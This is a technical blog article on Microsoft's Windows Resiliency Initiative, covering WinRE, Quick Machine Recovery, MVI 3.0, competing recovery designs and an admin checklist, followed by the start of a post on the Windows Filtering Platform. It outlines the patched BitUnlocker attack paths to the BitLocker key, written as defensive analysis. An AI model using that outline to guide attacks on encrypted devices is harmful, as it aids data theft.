Microsoft's program for third-party antivirus and endpoint detection vendors that ship products on Windows. MVI 3.0, effective April 1, 2025, adds Safe Deployment Practices, mandatory Trusted Signing, NDA, and 12-month independent test-lab certification as preconditions to maintain Windows AV driver signing rights [@ms-mvi, @ms-wri-ignite-2025].

The model is structurally identical to the canary / progressive-rollout pattern formalised in the Google SRE Book chapter on Release Engineering: hermetic builds, multiple deployment rings, gated promotion between rings, "Push on Green", and the option to cherry-pick at the same revision when a critical change is needed mid-cycle [@sre-release-eng]. MVI 3.0 is not a Microsoft invention; it is a Microsoft mandate of a model that has been industry practice for two decades. The mandate is what is new.

Layer 2: The Windows endpoint security platform

The same November 19, 2024 keynote committed to a Windows endpoint security platform that lets partners ship their detection logic outside kernel mode, with a private preview promised to security-partner programs by July 2025 [@ms-wri-ignite-2024]. The June 26, 2025 update confirmed the date with named partner endorsements [@ms-wri-jun-2025]. The architectural premise is the one BSOD survivors recognise immediately: a faulty user-mode component can be killed by Task Manager; a faulty kernel-mode driver bug-checks the system.

Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft, *Preparing for what's next*, November 18, 2025 [@ms-wri-ignite-2025].

Microsoft is careful to frame WRI as a floor-raiser, not a kernel ban. The November 18, 2025 update enumerates the driver-resiliency playbook for the surfaces that will remain in kernel mode: mandatory compiler safeguards (control-flow integrity, CFG, stack canaries), driver isolation, DMA-remapping, a higher signing bar, and expanded in-box Microsoft drivers and APIs that third parties can call rather than reimplementing [@ms-wri-ignite-2025]. The argument is that the kernel surface that must exist (graphics, storage, some networking) should be smaller, better isolated, and equipped with mitigations that contain a single fault.

The June 2025 partner roster is the most pointed piece of evidence that the user-mode direction predates and outlasts the July 2024 incident. CrowdStrike itself is named [@ms-wri-jun-2025]. The vendor that started the chain reaction is publicly endorsing the architectural concession the chain reaction priced into existence.

The Windows Resiliency Initiative is not Microsoft's only post-2023 security program. The umbrella is the *Secure Future Initiative* (SFI), announced in November 2023 as the company-wide response to identity-based attacks on Microsoft itself. WRI is the workstream inside SFI that owns Windows availability, kernel resilience, and the recovery path; SFI also owns identity hardening, supply-chain controls, and engineering culture changes. Microsoft's published WRI blogs are explicit that the recoverability program is "the Windows pillar of our Secure Future Initiative" framing, not a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

Layer 3: Intune-surfaced WinRE state

The November 18, 2025 update names a new Intune signal: "Intune will surface when a Windows device has booted into the Windows Recovery Environment (WinRE)" [@ms-wri-ignite-2025]. The same signal will appear in the Azure Portal for Windows Server VMs that switched into WinRE. The same update introduces a WinRE plug-in model: IT administrators can push custom recovery scripts through Intune, with the model documented as third-party-MDM-adoptable. Both are "coming soon" as of that announcement [@ms-wri-ignite-2025].

The architectural insight here is that Microsoft-pushed remediations (QMR) and administrator-pushed remediations (Intune scripts) must be expressible against the same WinRE surface, with Intune providing the visibility and audit layer.

Layer 4: Quick Machine Recovery

Already covered in Section 6. Status: GA August 2025 on Windows 11 24H2 build 26100.4700+ [@ms-qmr, @ms-wri-ignite-2025]. Autopatch QMR management is in preview at the November 2025 announcement [@ms-wri-ignite-2025].

Layer 5: Rebuild without shipping hardware

The November 18, 2025 update introduces three Microsoft-cloud-side recovery actions [@ms-wri-ignite-2025]:

Point-in-Time Restore (PITR). Cloud-orchestrated rollback to an earlier point-in-time snapshot of the device's full state. Status: available in the Windows Insider preview build the week of the announcement.
Cloud Rebuild. Intune-portal-triggered clean OS reimage using Autopilot for zero-touch provisioning, with user data and settings restored from OneDrive and Windows Backup for Organizations. Status: coming.
Windows 365 Reserve. A temporary Cloud PC for users whose endpoint is unusable. Status: generally available.

Each of these targets a scenario QMR cannot fix. PITR addresses regressions that the user-mode WU pipeline cannot patch back -- driver downgrades that need to roll back state, not push a new patch. Cloud Rebuild addresses devices whose local Windows is genuinely beyond surgical repair. Windows 365 Reserve addresses the productivity gap while the local device is being recovered.

All five layers are anchored on Microsoft blogs and Microsoft Learn pages. None of them is unique to Microsoft. Apple, ChromeOS, and the Linux atomic distributions have each chosen a different layered architecture for the same problem. What does the field actually look like?

8. Competing Models: Apple, ChromeOS, and the Linux Atomic Distributions

Microsoft is not the first vendor to treat recovery as part of its security architecture. It is, at consumer scale, among the last. Apple, Google, and the Linux atomic-distribution community each picked a different layer to anchor on.

Apple macOS: Signed System Volume + paired/fallback recoveryOS + 1TR

macOS 10.15 (Catalina, 2019) introduced the read-only system volume. macOS 11 (Big Sur, 2020) added the Signed System Volume on top of it: a SHA-256 Merkle tree over every block of the system volume, sealed by Apple at install or update time [@apple-ssv]. On Apple Silicon, the bootloader verifies the seal before transferring control to the kernel; on Intel-based Macs with the T2 Security Chip, the bootloader forwards the measurement and signature to the kernel, which verifies the seal directly before mounting the root file system [@apple-ssv]. On verification failure, the Mac drops into recoveryOS automatically and prompts the user to reinstall.

The recovery side has three flavours [@apple-boot]: a paired recoveryOS that exactly matches the installed system version; on Apple Silicon, a fallback recoveryOS (the previous OS version); and a hardware-anchored 1TR ("one true recovery") environment that survives even when the paired recoveryOS is broken. The 1TR environment is anchored in the Secure Enclave, which is the macOS analogue of Windows's signed bootmgfw.efi on the EFI System Partition.

What Apple excels at is tampered system files and failed updates: the first block read fails Merkle verification; the snapshot pointer flips to the prior good snapshot; the user reboots into a working system. What Apple does not have is an analogue of QMR's targeted remediation pipeline. The macOS answer to a faulty signed third-party security agent is "reinstall macOS". That is wipe-and-reload, not surgical repair.

ChromeOS: Verified Boot + A/B root partitions + auto-rollback

ChromeOS's verified-boot design has been the same since 2010 [@chromium-verified-boot]. A read-only boot stub, anchored in write-protected EEPROM, computes a cryptographic hash of the read-write firmware (SHA-1 in the original 2010 specification; SHA-256 in current production firmware) and verifies an RSA signature (at least 2048 bits) against a permanently stored public key [@chromium-verified-boot]. The verified read-write firmware then hashes the kernel and verifies its signed hashes. A transparent block device in the kernel verifies each block against a stored hash tree on every read, with the tree's root signed by the firmware.

The recovery story is the brilliant part. ChromeOS devices have two root partitions, ROOT-A and ROOT-B, plus a separate stateful partition for user data [@chromium-autoupdate]. Each root partition carries a remaining_attempts counter (default 6) stored in unused GPT bits next to the bootable flag. On N consecutive failed boots, the boot loader falls back to the other partition. Auto-updates always write to the partition not currently in use, never the booted one. The result is that ChromeOS recovers from a faulty signed system update in one reboot per device, automatically, without an operator action. This is the empirical upper bound on automation: no fielded platform recovers a signed-but-faulty boot path faster than one reboot.

Linux atomic distributions: OSTree, rpm-ostree, bootc

OSTree, the upstream of Fedora's atomic desktops and CoreOS, is "Git for operating system binaries" [@fedora-silverblue]. It stores content-addressed objects under /ostree/repo, builds atomic deployments as hardlink farms under /boot/loader/entries/ostree-$stateroot-$checksum.$serial.conf, performs a three-way merge of /etc between the booted deployment and the new one, and atomically swaps the boot directory by flipping a symlink between /ostree/boot.0 and /ostree/boot.1 [@ostree-atomic]. The crash-safe guarantee is verbatim: "if the system crashes or you pull the power, you will have either the old system, or the new one" [@ostree-atomic].

Fedora Silverblue, Fedora CoreOS, Endless OS, and (since 2024) Fedora's bootc container-based desktops all ship OSTree by default [@fedora-silverblue]. Where OSTree excels is server fleets and developer workstations; where it struggles is layered third-party packages crossing deployments (the rebase/deploy friction) and the absence of a network-reachable in-recovery remediation analogue to QMR.

Traditional Linux: dracut + GRUB rescue + initramfs

The "manual safe-mode + delete-the-file" model. A skilled operator with shell access plus iLO / iDRAC / IPMI serial-over-LAN can repair a Linux box; everyone else is in trouble. The CrowdStrike-style incident response on traditional Linux would look exactly the same as it did on Windows: per-device, skilled operator, no automation. The Linux distributions that did avoid this fate are the OSTree-based atomic ones; the conventional ones are at the same operator-bound floor Windows just climbed off.

flowchart TB subgraph WIN[Windows: WinRE + QMR] WIN_WIM[winre.wim on recovery partition or in OS-volume folder] --> WIN_WU[Windows Update endpoint] end subgraph APL[Apple: macOS] APL_PR[Paired recoveryOS] --> APL_SNAP[APFS snapshot revert] APL_FB[Fallback recoveryOS / 1TR in Secure Enclave] --> APL_SNAP end subgraph CHR[ChromeOS] CHR_BOOTA[ROOT-A] --> CHR_FALLBACK[Boot loader falls back to other root] CHR_BOOTB[ROOT-B] --> CHR_FALLBACK end subgraph OS[Linux atomic / OSTree] OS_DEPNEW[New deployment] --> OS_PRIOR[Prior deployment retained for rollback] end

A head-to-head comparison

The dimensions that matter are: year shipped, in-recovery network capability, auto-remediation, signed-but-faulty-driver protection, per-device operator cost during a fleet event, trust floor, and encrypted-volume recovery story.

Dimension	Windows WinRE + QMR	Apple SSV + recoveryOS	ChromeOS A/B + verified boot	Linux atomic (OSTree)	Conventional Linux
Year shipped	WinRE 2007 [@wiki-winre]; QMR 2025 [@ms-qmr]	SSV 2020; recoveryOS / 1TR 2020 [@apple-ssv, @apple-boot]	Verified Boot 2010 [@chromium-verified-boot]	OSTree 2012 (dev started 2011); rpm-ostree later [@ostree-atomic, @fedora-silverblue]	dracut 2009; GRUB 2 2009
In-recovery network capability	Yes (WPA/WPA2 Wi-Fi or wired) [@ms-qmr]	Yes for reinstall; no targeted remediation	Yes for recovery image fetch	No standard pipeline	No
Auto-remediation without operator	Yes (one-time or looped) [@ms-qmr]	No (user confirms reinstall)	Yes (boot loader fallback) [@chromium-autoupdate]	No (user selects rollback in GRUB)	No
Protection against signed-but-faulty drivers	Behavioural via MVI 3.0 SDP + user-mode AV [@ms-mvi, @ms-wri-jun-2025]	DriverKit / System Extensions push third parties out of kernel	A/B rollback auto-recovers in one boot cycle	Layered package rolls back with deployment	None
Per-device operator cost in a fleet event	O(1) -- publish remediation once	O(N) -- each user reinstalls	O(0) -- automatic per device	O(N) -- each user selects rollback	O(N) -- skilled operator per device
Trust floor (unrecoverable without external media)	Corrupted `bootmgfw.efi`, missing WinRE, lost BitLocker key	Failed 1TR (very rare)	Both root partitions plus EEPROM corrupted	GRUB unreachable	GRUB unreachable
Encrypted-volume recovery story	BitLocker recovery key required [@ms-qmr]	FileVault key required if at-rest read needed	Stateful partition holds user data only	LUKS passphrase required	LUKS passphrase required

The notable row is the per-device operator cost during a fleet event. QMR moves Windows from O(N) (pre-WRI) to O(1) (post-WRI). ChromeOS was already at O(0) thanks to the A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N).

Key idea: The per-device operator cost row is the one Microsoft engineered WRI to change. QMR moves Windows from O(N) to O(1). ChromeOS was already at O(0) by virtue of A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N). This is the empirical justification for the thesis that resilience is a security property: pre-WRI Windows, despite shipping BitLocker, HVCI, and Secure Boot, had a recoverability complexity class worse than ChromeOS. A faulty signed driver could exploit that gap to deny service at fleet scale.

Three vendors got to fleet-scale recovery earlier. Microsoft's catch-up move is constrained by what Microsoft does not control: OEM partition layouts, BIOS/UEFI variance, BitLocker key escrow.Apple ships hardware-plus-OS and Google ships ChromeOS against an OEM-certified hardware spec, both of which let those vendors specify partition layout end to end. Microsoft ships the OS and asks OEMs to follow the Image Configuration Designer defaults; some do, some do not. The KB5028997 workaround for "recovery partition too small for new winre.wim" is precisely the artefact of Microsoft not being able to mandate the layout [@ms-winre-tech-ref, @ms-kb5028997]. Those constraints set hard limits on what WRI can fix, and they are the reason the trust-floor row in the table is longer for Windows than for ChromeOS.

9. Theoretical Limits and the BitUnlocker Counter-Current

Two well-known results from the systems and security literature say that no fielded recovery primitive can be perfect, and Microsoft's own offensive-research team demonstrated, at Black Hat USA 2025 in August 2025, exactly which limit WRI runs into [@alon-leviev].

The trust-floor lower bound

No system can recover from corruption of all of its boot-path code without external media, because the verification step that detects corruption is itself part of the boot-path code. ChromeOS encodes this with a write-protected EEPROM that an attacker cannot rewrite without a hardware write-protect override [@chromium-verified-boot]; Apple encodes it with the 1TR environment anchored in the Secure Enclave [@apple-boot]; Windows encodes it by requiring the EFI System Partition plus a signed bootmgfw.efi. Below that floor, QMR, OSTree, and APFS snapshots are all helpless. The recovery surface bounded by what fits in write-protected non-volatile storage is the lower bound on automated recovery.

The end-to-end argument applied to recovery

Saltzer, Reed, and Clark's 1984 End-to-End Arguments in System Design [@saltzer-reed-clark-1984] argued that correctness checks belong at the endpoints of a communication system, not in intermediate nodes. Applied to update pipelines, the argument predicts that bug-free updates cannot be guaranteed by intermediate nodes (the vendor's QA fleet, the CDN, the Windows Update service). Correctness can only be observed at the endpoint. The corollary is that the probability of a faulty update reaching production cannot be driven to zero by any amount of pre-release testing; the platform's design must instead bound blast radius and time-to-recovery of the faulty updates that will inevitably ship. MVI 3.0's SDP bounds the first (deployment rings); QMR bounds the second (network-reachable remediation). The argument is identical to the canary / progressive-rollout pattern in Google's SRE Book Release Engineering chapter [@sre-release-eng].

The attack-surface trade-off

An auto-unlocking, network-reachable recovery environment expands the Trusted Computing Base. Every additional capability added to the recovery path is a new code path; a new code path is a new attack vector. The BitUnlocker research, by Netanel Ben Simon and Alon Leviev at Microsoft's Security Testing and Offensive Research (STORM) team [@alon-leviev, @ms-bitunlocker-blog], is the most pointed evidence we have that the trade-off is real.

STORM -- Security Testing and Offensive Research at Microsoft -- is the internal red team. Their job is to break Microsoft products before someone else does. BitUnlocker was first presented at Black Hat USA 2025 and DEF CON 33, both in August 2025; the four CVEs were patched in the July 8, 2025 cumulative update, ahead of the disclosure [@alon-leviev, @ms-bitunlocker-blog]. The patches landed one Patch Tuesday cycle before QMR went generally available [@ms-wri-ignite-2025]. In the same summer, the same vendor that made WinRE reachable from Windows Update made WinRE harder to abuse. The set of hardware, firmware, and software components on which a system's security policy ultimately depends. A bug in a TCB component can undermine the entire security policy; everything outside the TCB is, by definition, untrusted relative to it. Recovery environments expand the TCB because they need privileged access to encrypted user state.

The four BitUnlocker CVEs are all rated CVSS 6.8:

CVE-2025-48804 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via boot.sdi parsing.
CVE-2025-48003 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via SetupPlatform.exe / Shift+F10 abuse during the WinRE Apps Scheduled Operation.
CVE-2025-48800 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via tttracer.exe abuse during Offline Scanning.
CVE-2025-48818 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via BCD parsing in the Online PBR exploit chain; the fourth pillar of the chain.

The published Microsoft Security blog post on BitUnlocker enumerates the architectural attack surfaces verbatim under three section headings: Attacking Boot.sdi Parsing, Attacking ReAgent.xml Parsing, and Attacking Boot Configuration Data (BCD) Parsing [@ms-bitunlocker-blog]. The premise is the same in every case. WinRE must read the OS volume's BitLocker recovery material to perform repairs. Therefore WinRE has code paths that, given the right inputs, can obtain the decrypted Full Volume Encryption Key. The four CVEs each find a parser or debugger inside WinRE whose input handling can be steered by an attacker with brief physical access to flip the recovery flow into a state where the decrypted FVEK becomes reachable.

flowchart TD PA[Physical access foothold] --> SDI[Attacking boot.sdi parsing -- CVE-2025-48804] PA --> RA[Attacking ReAgent.xml / SetupPlatform.exe -- CVE-2025-48003] PA --> BCD[Attacking BCD parsing / Online PBR -- CVE-2025-48818] PA --> TT[Abusing tttracer.exe Offline Scanning -- CVE-2025-48800] SDI --> FVEK[Reach decrypted FVEK on OS volume] RA --> FVEK BCD --> FVEK TT --> FVEK FVEK --> EX[BitLocker bypass; data exfiltration]

The encrypted-volume impossibility

Unattended recovery of an encrypted volume without the key is impossible. It is a security correctness requirement, not a limitation that engineering can fix. QMR explicitly does not bypass BitLocker [@ms-qmr]. Apple's FileVault, ChromeOS's TPM-bound user partition, and Linux LUKS all share this property; none of them gets to be exempt from the requirement that the key be present somewhere before the encrypted volume can be modified offline.

Note: Every additional capability added to the recovery path is an additional attack vector against the encrypted user state that the recovery path is privileged to access. QMR's network reachability is a feature for the operator and a feature for the attacker. The article's thesis is not WRI makes Windows safer in absolute terms; it is WRI moves the trade-off to a different curve. The same vendor making the recovery surface reachable from Windows Update is the vendor that has to harden it against itself.

The upper bound

ChromeOS A/B auto-rollback recovers a single device in one reboot cycle without operator action [@chromium-autoupdate]. This is the empirical upper bound on automation. No fielded platform recovers a signed-but-faulty boot path faster than one reboot per device. QMR matches the ChromeOS upper bound in the steady state once a remediation is published; the only thing QMR cannot do that ChromeOS does is recover from the first signed-but-faulty update before Microsoft has authored the remediation. The lower bound on time-to-fleet-recovery is set by the production lead time of Microsoft's own QA pipeline plus the time to author and publish the targeted patch.

Microsoft's own offensive-research team published the BitUnlocker chain one Patch Tuesday before QMR went generally available. That is not a coincidence; it is the price of moving WinRE up the trust ladder. The next question -- what has not been priced yet? -- belongs in the open-problems list.

10. Open Problems: Where Microsoft Has Not Committed

WRI is a current commitment with a published roadmap. The roadmap has explicit holes. Each of the six below is documented from a primary Microsoft source -- either by what the source says or, in the most honest cases, by what it does not say.

Network protocol surface in WinRE. The Microsoft Learn QMR page is explicit: only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported as of November 2025 [@ms-qmr]. Enterprise 802.1X and WPA3-Enterprise with device certificates are committed in the November 18, 2025 update as coming soon under the Wi-Fi 7 for Enterprise and WinRE-reads-from-Windows lines, but no shipping date is published [@ms-wri-ignite-2025]. For an enterprise on 802.1X, this is the most visible gap: a managed-fleet device on a corporate SSID cannot reach Windows Update from inside WinRE today.

Safe-mode hardening as a discrete deliverable. The phrase "safe mode hardening" has no first-party Microsoft anchor as a discrete WRI deliverable. The closest documented item is Administrator Protection, announced in the November 19, 2024 Ignite blog as a constraint on elevated-context behaviour [@ms-wri-ignite-2024]. That is not the same thing. The Safe Mode boot path that the CrowdStrike incident used to delete C-00000291*.sys was the same Safe Mode boot path that has existed since Windows NT; nothing in the WRI primary sources commits to changing what Safe Mode does or does not load. Honest reading: WRI re-prices the recovery surface around Safe Mode; it does not (yet) change Safe Mode itself.

Cross-vendor partition layout. The Microsoft Learn WinRE Technical Reference [@ms-winre-tech-ref] documents the recommended ICD-media layout but does not enforce it. Clean Windows Setup, OEM-installed Windows, and ICD-media-installed Windows produce different recovery-partition layouts, and the existence of KB5028997 (the well-known workaround for "recovery partition too small for the new winre.wim") is a direct consequence. ChromeOS and macOS do not have this problem because Google and Apple control the layout end to end. Microsoft chose, decades ago, not to.

Third-party MDM support for the WinRE plug-in model. The November 18, 2025 update describes the WinRE plug-in model as third-party-MDM-adoptable, but no third-party MDM vendor had shipped a plug-in or a QMR management surface as of that announcement [@ms-wri-ignite-2025]. Customers on JAMF, Workspace ONE, Tanium, or similar do not yet have a documented integration path. If the future of recovery is Intune-coupled, WRI's reach is bounded by Intune adoption.

BitLocker key escrow as a WRI deliverable. No WRI primary source ([@ms-wri-ignite-2024, @ms-wri-jun-2025, @ms-wri-ignite-2025]) names "BitLocker recovery key flows" as a discrete WRI deliverable. The adjacent items are: hardware-accelerated BitLocker on new devices starting spring 2026 [@ms-wri-ignite-2025]; the BitUnlocker CVE patches in July 2025 [@ms-bitunlocker-blog]; and the Entra ID self-service BitLocker recovery flow at aka.ms/aadrecoverykey [@ms-kb5042421]. The current state is that BitLocker key escrow is an Entra ID and Intune feature, not a WRI feature. QMR's value is bounded by BitLocker key availability for the encrypted-volume fraction of any fleet; a WRI deliverable that improved key escrow would compound QMR's benefit. None has been announced.

Recovery in air-gapped and sovereign environments. QMR routes through Windows Update. Air-gapped fleets, sovereign-cloud customers, and offline manufacturing networks cannot reach Windows Update from WinRE. The November 18, 2025 update mentions Connected Cache, but no QMR-Connected-Cache integration is committed [@ms-wri-ignite-2025]. For the high-assurance customer who today does not let manufacturing endpoints talk to the public Internet at all, QMR is a feature for someone else.

Note: The six items above are gaps in the roadmap, anchored either by what Microsoft has explicitly named as coming-soon or by the absence of a primary source. They are not features. The article distinguishes Microsoft-committed deliverables (cited to a primary source) from adjacent inferences. Readers reviewing WRI for their own fleets should do the same.

These six gaps are where the next year of WRI roadmap will be argued. None of them is closed; some are closed-soon. For the practitioner, the immediate question is what to do, today, with what is shipping right now.

11. Practitioner's Guide

Everything above is architecture. This section is the checklist.

1. Verify WinRE is provisioned. Run reagentc /info from an elevated prompt. The output should say Windows RE status: Enabled and point at a sensible WinRE location -- typically \?\GLOBALROOT\device\harddisk0\partitionN\Recovery\WindowsRE or C:\Windows\System32\Recovery\WindowsRE. If the status is Disabled, run reagentc /enable. If the recovery partition is too small for a new winre.wim (a known issue surfacing with cumulative updates that grow the image, surfaced as a System event ID 4502 with ErrorPhase 2), follow KB5028997 [@ms-kb5028997, @ms-winre-tech-ref].

The mitigation, in outline: disable WinRE temporarily (`reagentc /disable`); shrink the OS partition via `diskpart` by enough megabytes (250 MB minimum per Microsoft's published procedure) to host a larger recovery partition; recreate the recovery partition with the GPT Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and the GPT attributes value `0x8000000000000001` that hides it from automounting; re-enable WinRE (`reagentc /enable`) so the new `winre.wim` is copied into the resized partition. The Microsoft Support KB article carries the exact `diskpart` commands [@ms-kb5028997], with the Windows RE Technical Reference as the architectural anchor [@ms-winre-tech-ref]. Test on a representative device first; the resize is not reversible without re-imaging.

2. Audit your QMR posture before turning it on. On Enterprise, Education, and managed Pro, cloud remediation is off by default [@ms-qmr]. Decide first; ring second; roll out third. The Intune Settings Catalog path is Remote Remediation > Enable Cloud Remediation. Pre-stage a WPA/WPA2 Wi-Fi credential via reagentc.exe /SetRecoverySettings if your recovery network is wireless.

3. Use the test-mode dry run. reagentc.exe /SetRecoveryTestmode followed by reagentc.exe /BootToRe triggers a simulated QMR cycle. The simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS. Run it on a pilot ring before depending on QMR in a real incident [@ms-qmr].

4. Plan for BitLocker key availability. Ensure recovery keys are escrowed to Entra ID, not just printed on a card in a drawer. Enable the Entra ID self-service flow at aka.ms/aadrecoverykey so an unattended user can retrieve their own key during an incident [@ms-kb5042421].

5. Know the difference between Cloud Reset, QMR, and Autopilot Reset. Cloud Reset (in-Windows Reset this PC > Cloud download) reinstalls a running OS [@ms-pbr-overview]. QMR runs in WinRE before the OS boots, applying targeted patches from Windows Update [@ms-qmr]. Autopilot Reset re-provisions a bootable device via Intune. Three different tools, three different scenarios; do not confuse them in your runbook.

6. Watch for the November 2025 Intune signals. Once Intune surfaces WinRE state in the admin centre, build the muscle of looking for it. The roll-up that tells you "12 devices are in WinRE right now" is the operational primitive Microsoft did not have through July 2024 [@ms-wri-ignite-2025].

Note: Promote step 3 (the test-mode dry run) into your incident-response runbook now [@ms-qmr]. The time to discover that the recovery Wi-Fi SSID changed last quarter is not in the middle of a fleet-down event.

Note: QMR cannot decrypt the OS volume. It applies Windows Update patches that take effect on the next boot, but it cannot run against an encrypted volume's contents without the BitLocker recovery key being available [@ms-qmr]. If a device's BitLocker key is not escrowed to Entra ID and the user is not available to read it from a printout, QMR cannot help. Key escrow is upstream of recovery; treat it that way.

The reagentc /info output is short and uniform enough that a small script can classify the device's WinRE health. The block below sketches one in JavaScript pseudocode.

{` // reagentc /info is a small, deterministic text block. Parse it.

const sampleOutput = ` Windows Recovery Environment (Windows RE) and system reset configuration Information:

Windows RE status:         Enabled
Windows RE location:       \\\\?\\\\GLOBALROOT\\\\device\\\\harddisk0\\\\partition4\\\\Recovery\\\\WindowsRE
Boot Configuration Data (BCD) identifier: a1b2c3d4-...-winre-guid
Recovery image location:
Recovery image index:      0
Custom image location:
Custom image index:        0

REAGENTC.EXE: Operation Successful. `;

function classify(output) { const status = /Windows RE status:\s+(\w+)/.exec(output)?.[1]; const location = /Windows RE location:\s+(\S+)/.exec(output)?.[1] || ''; const partitionMatch = /partition(\d+)\\Recovery\\WindowsRE/.exec(location); const onPartition = !!partitionMatch; const onOsVolume = /^[A-Z]:\\Recovery\\WindowsRE/.test(location);

if (status !== 'Enabled') { return { status, action: 'reagentc /enable -- WinRE is not active' }; } if (!onPartition && !onOsVolume) { return { status, action: 'Unknown layout; verify with diskpart and reagentc' }; } if (onPartition) { return { status, layout: 'recovery-partition', partition: partitionMatch[1], note: 'If cumulative updates fail with insufficient-space errors, see KB5028997', }; } return { status, layout: 'os-volume-recovery-folder', note: 'OEM-style layout; some Intune' + ' policies assume a separate partition. Confirm before relying on remote remediation.' }; }

console.log(classify(sampleOutput)); `}

The practical questions answered, the article closes with a set of FAQs that catch the common misconceptions.

12. Frequently Asked Questions and Closing Thoughts

No. WRI's *Windows endpoint security platform* gives MVI partners a user-mode runtime so their detection logic does not have to live in a kernel-mode `.sys` file [@ms-wri-jun-2025, @ms-wri-ignite-2025]. Kernel-mode drivers as a class are not retired: the November 18, 2025 update is explicit that "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-wri-ignite-2025], and the driver-resiliency playbook (compiler safeguards, driver isolation, DMA-remapping, higher signing bar) is precisely for the kernel-mode surface that will remain. No. The Microsoft Learn QMR page is explicit that the recovery flow does not decrypt the OS volume [@ms-qmr]. If the BitLocker recovery key is unavailable, QMR cannot help. The recommended escrow path is Entra ID, with the user-facing self-service flow at `aka.ms/aadrecoverykey` [@ms-kb5042421]. No. The BCD Boot Options Reference enumerates every legal element on a boot entry, and there is no `/recovery` flag on `winload.efi` or `winload.exe` [@ms-bcd]. WinRE is selected by following the `recoverysequence` element of the OS-loader entry to a separate BCD entry whose `winpe` is `Yes` and whose `osdevice` mounts `winre.wim` from a `boot.sdi`-backed RAM disk. The entire handoff is inside the boot manager, before `winload.efi` runs. No. The four CVE-2025-48800/-48003/-48804/-48818 advisories were patched in the July 8, 2025 cumulative update before QMR went generally available in August 2025 [@ms-bitunlocker-blog, @ms-wri-ignite-2025]. The patches addressed parser and debugger code paths inside WinRE; they did not remove WinRE's ability to read the OS volume's BitLocker recovery material, which is a feature WinRE needs in order to perform any repair on an encrypted volume. No. The Secure Future Initiative (SFI), announced in November 2023, is Microsoft's company-wide security program. WRI is the Windows-specific workstream inside SFI that owns Windows availability, kernel resilience, and the recovery surface; the published WRI blogs frame it as the Windows pillar of SFI rather than a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025]. QMR will not connect. The Microsoft Learn page is explicit that only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported [@ms-qmr]. The November 18, 2025 update commits to WPA3-Enterprise with device certificates as part of the WinRE-reads-from-Windows networking work and the *Wi-Fi 7 for Enterprise* line, but it does not give a shipping date [@ms-wri-ignite-2025]. For now, enterprises whose recovery story depends on QMR over Wi-Fi must either stand up a dedicated WPA2-PSK recovery SSID or rely on wired recovery. The code is mostly the same. What changed is the *policy* that lets WinRE call Windows Update without an operator at the keyboard. WinPE has shipped networking drivers since 2002 [@ms-winpe-intro], and `winre.wim` has been bootable from a recovery partition since 2009. The breakthrough is the commitment that the recovery environment is allowed to phone home -- and the surrounding program (MVI 3.0, the user-mode AV platform, Intune visibility) that makes it usable as a fleet-scale primitive.

Closing

The Windows Recovery Environment that worked perfectly on July 19, 2024 is the same Windows Recovery Environment that became Microsoft's most important security surface on August 1, 2025. The architecture did not change in the year between. The question we ask of it did.

The CrowdStrike incident did not invent the case for resilience as a security property. It priced it. Two months after the bug check signature csagent+0xe14ed made the rounds, Microsoft and the MVI cohort sat down at WESES to argue out what would become MVI 3.0 [@ms-weses]. Three months after that, the Ignite 2024 keynote committed to Quick Machine Recovery and to a user-mode antimalware platform [@ms-wri-ignite-2024]. Five months after that, the first QMR code shipped on the Beta Channel [@ms-qmr-insider-mar2025]. Twelve months after the incident, MVI 3.0 was binding [@ms-wri-ignite-2025]. Thirteen months after, QMR went generally available -- and BitUnlocker had been patched a month earlier in the July 2025 cumulative update. Sixteen months after, Microsoft published the rebuild-without-shipping-hardware roadmap [@ms-wri-ignite-2025].

WRI does not eliminate the trade-off between recoverability and attack surface. It moves the trade-off to a curve where the per-device cost of a fleet-down event is not bounded by human attention, and where the recovery code path is hardened by the same vendor's offensive-research team. Those are different curves than the ones the platform was on in July 2024. They are not the curves a textbook chapter on Windows internals would have predicted in 2014. They are also still the curves of a single vendor's program, anchored on a small number of blog posts and Microsoft Learn pages, and the work of validating them belongs in every fleet that depends on Windows for availability.

If WinRE worked perfectly on July 19, 2024 and that was the problem, the test of WRI is whether the next July 19, 2026 never makes the news.

Windows Filtering Platform: The Kernel-Mode Firewall You Don't See

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

Open wf.msc. Right-click "Inbound Rules," click "New Rule," fill in the form, click OK. You think you just configured a firewall. What you actually did was register one filter, inside one sublayer, at one of roughly sixty filtering layers in the kernel-mode classification path of a platform you have never named. The same platform is also running IPsec, container networking, Microsoft Defender for Endpoint's network protection, and every third-party EDR's network-telemetry pipeline on the Windows host you are using right now.

The Windows Filtering Platform (WFP) is the kernel- and user-mode service Microsoft shipped with Windows Vista in November 2006 to replace four mutually-incompatible XP-era hooks: NDIS intermediate drivers, the filter-hook IOCTL on `\Device\Ipfilterdriver`, Winsock Layered Service Providers, and TDI filter drivers. It is the substrate beneath Windows Defender Firewall, Windows IPsec, WinNAT, the Hyper-V Extensible Switch, Defender for Endpoint Network Protection, and every third-party EDR's network telemetry. WFP is not a firewall. It is the platform that a firewall is one consumer of. It arbitrates competing security products deterministically through 64-bit filter weights inside priority-ordered sublayers, and that arbitration model is the load-bearing reason third-party callouts can finally coexist on the same host. The same kernel-extensibility tax that doomed the pre-WFP hooks now resurfaces as a steady drip of Base Filtering Engine elevation-of-privilege CVEs (CVE-2023-29368, CVE-2024-38034) -- the running cost of a platform sophisticated enough to host every downstream network-security feature Windows ships.

1. You Just Clicked OK on Sixty Filtering Layers

The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature is a configuration of the same engine.

